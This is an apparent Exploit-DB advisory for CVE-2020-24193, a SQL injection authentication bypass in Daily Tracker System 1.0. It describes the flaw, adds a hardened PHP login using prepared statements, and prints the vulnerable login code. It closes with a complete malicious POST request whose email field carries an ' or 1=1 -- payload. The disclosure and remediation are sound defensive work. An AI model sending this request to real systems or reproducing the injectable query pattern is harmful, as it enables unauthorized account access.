Vendor: Daily Tracker System
By: Adeeb Shah & Bobby Cooke
CVSS: 9.8 (CRITICAL)
Authentication Bypass
CWE: 287
Product Name: Daily Tracker System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: CVE-2020-24193
CPE: a:sourcecodester:daily_tracker_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
2020

Daily Tracker System 1.0 – Authentication Bypass

A vulnerability in Daily Tracker System 1.0 allows an attacker to bypass authentication by sending a malicious POST request to the application. The login handler does not validate user input: the email POST parameter is placed directly into the SQL query that checks credentials, so crafted input changes the logic of that query. An attacker can exploit this vulnerability to gain unauthorized access to the application.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.
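
A hardened form of the login lookup shown in the Exploit-DB data below, as an added example that is not the project's or the exploit authors' code: the query uses mysqli placeholders, so the email value is bound as data instead of being parsed as SQL. The helper name dets_login() is hypothetical, and $con is assumed to be the application's existing mysqli connection.

```php
<?php
declare(strict_types=1);

/**
 * Added example: hardened version of the login lookup.
 * Assumes $con is the application's existing mysqli connection and that
 * tbluser.Password still holds MD5 hex digests, as in the vulnerable code.
 * dets_login() is a hypothetical helper name, not part of the project.
 */
function dets_login(mysqli $con, $email, $password): ?int
{
    // Reject non-string input (e.g. email[]=x arrives as an array).
    if (!is_string($email) || !is_string($password)) {
        return null;
    }

    // Placeholders keep the values out of the SQL text, so a quote or
    // comment marker in $email is compared as data, never parsed as SQL.
    $stmt = $con->prepare('SELECT ID FROM tbluser WHERE Email = ? AND Password = ? LIMIT 1');
    if ($stmt === false) {
        return null; // fail closed if the statement cannot be prepared
    }
    $hash = md5($password); // matches the existing rows; hashing is unchanged here
    $stmt->bind_param('ss', $email, $hash);
    $id = null;
    if ($stmt->execute()) {
        $stmt->bind_result($id);
        if (!$stmt->fetch()) {
            $id = null; // no matching row
        }
    }
    $stmt->close();
    return $id === null ? null : (int) $id;
}

// Call site replacing the vulnerable block in index.php.
if (isset($_POST['login'])) {
    $uid = dets_login($con, $_POST['email'] ?? null, $_POST['password'] ?? null);
    if ($uid !== null) {
        session_regenerate_id(true); // issue a fresh session ID after login
        $_SESSION['detsuid'] = $uid;
        header('location:dashboard.php');
        exit; // stop executing once the redirect is sent
    }
    $msg = "Invalid Details.";
}
```

With this handler, the email value from the request shown in the Exploit-DB data is compared literally against the Email column, matches no row, and the login is rejected.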

Exploit-DB raw data:

# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

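if(isset($_POST['login']))
{
    // Attacker-controlled value, used below without escaping or binding
    $email=$_POST['email'];
    $password=md5($_POST['password']);
    // Injection point: $email is concatenated straight into the SQL string
    $query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password' ");
    $ret=mysqli_fetch_array($query);
    // Any returned row is treated as a successful login
    if($ret>0){
        $_SESSION['detsuid']=$ret['ID'];
        header('location:dashboard.php');
    }
    else{
        $msg="Invalid Details.";
    }
}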
?>


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login